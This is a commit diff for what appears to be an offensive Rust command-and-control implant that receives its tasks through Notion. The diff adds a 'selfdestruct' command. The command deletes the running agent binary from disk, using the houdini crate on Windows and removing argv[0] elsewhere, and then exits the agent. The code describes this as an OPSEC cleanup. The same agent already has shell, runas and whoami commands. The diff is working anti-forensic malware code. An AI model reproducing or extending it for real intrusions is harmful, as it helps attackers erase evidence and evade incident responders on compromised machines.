self destruct mvp

agent/Cargo.toml

@@ -27,6 +27,8 @@ embed-resource = "1.6"
 kernel32-sys = "0.2.2"
 winapi = { version = "0.3.8", features = ["winnt","winuser", "handleapi", "processthreadsapi", "securitybaseapi"] }
 winreg = "0.10"
+houdini = "1.0.2"
+
 
 [profile.dev]
 opt-level = 0

agent/src/cmd/mod.rs

@@ -24,6 +24,7 @@ mod sleep;
 mod shutdown;
 mod whoami;
 mod unknown;
+mod selfdestruct;
 
 /// All the possible command types. Some have command strings, and some don't.
 pub enum CommandType {
@@ -37,6 +38,7 @@ pub enum CommandType {
     Ps,
     Pwd,
     Save,
+    Selfdestruct,
     Runas,
     Shell,
     Shutdown,
@@ -156,6 +158,7 @@ impl NotionCommand {
                 "pwd"      => CommandType::Pwd,
                 "runas"    => CommandType::Runas,
                 "save"     => CommandType::Save,
+                "selfdestruct" => CommandType::Selfdestruct,
                 "shell"    => CommandType::Shell,
                 "shutdown" => CommandType::Shutdown,
                 "sleep"    => CommandType::Sleep,
@@ -182,6 +185,7 @@ impl NotionCommand {
             CommandType::Pwd         => pwd::handle().await,
             CommandType::Runas    => runas::handle(&self.args).await,
             CommandType::Save     => save::handle(&mut self.args, config_options).await,
+            CommandType::Selfdestruct => selfdestruct::handle().await,
             CommandType::Shell    => shell::handle(&mut self.args).await,
             CommandType::Shutdown    => shutdown::handle().await,
             CommandType::Sleep    => sleep::handle(&mut self.args, config_options).await,

agent/src/cmd/selfdestruct.rs

@@ -0,0 +1,38 @@
+use std::error::Error;
+use std::env::args;
+use std::fs::remove_file;
+#[cfg(windows)] use houdini;
+#[cfg(windows)] use rand::{thread_rng, Rng};
+#[cfg(windows)] use rand::distributions::Alphanumeric;
+
+
+pub async fn handle() -> Result<String, Box<dyn Error>> {
+        /// Performs some OPSEC cleanups, deletes itself from disk, and kills the agent.
+        /// Burn after reading style.
+        /// For Windows, makes use of Yamakadi's fantastic houdini crate, based on jonaslyk's self-deleting binary research and byt3bl33d3r's Nim POC
+        /// For Nix, just deletes arg[0] lol.
+        /// Usage: selfdestruct 🎯
+
+        // TODO: Overwrite proc memory with junk
+
+        // Delete bin on disk
+
+        #[cfg(windows)] {
+                let rand_string: String = thread_rng()
+                .sample_iter(&Alphanumeric)
+                .take(12)
+                .map(char::from)
+                .collect();
+
+                houdini::disappear_with_placeholder(rand_string);
+        }
+
+        #[cfg(not(windows))] {
+                let running_agent: String = args().nth(0).unwrap();
+                remove_file(running_agent)?;
+        }
+
+        // Shutdown agent
+        // In main.rs, shutdown::handle exits the current running process
+        Ok("[!] This agent will now self-destruct!\n[!] 3...2...1...💣💥!".to_string())
+}

agent/src/main.rs

@@ -144,6 +144,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
                         // Like shutting down the agent
                         match notion_command.command_type {
                             CommandType::Shutdown => {exit(0);},
+                            CommandType::Selfdestruct => {exit(0)},
                             _ => {}
                         }
                     };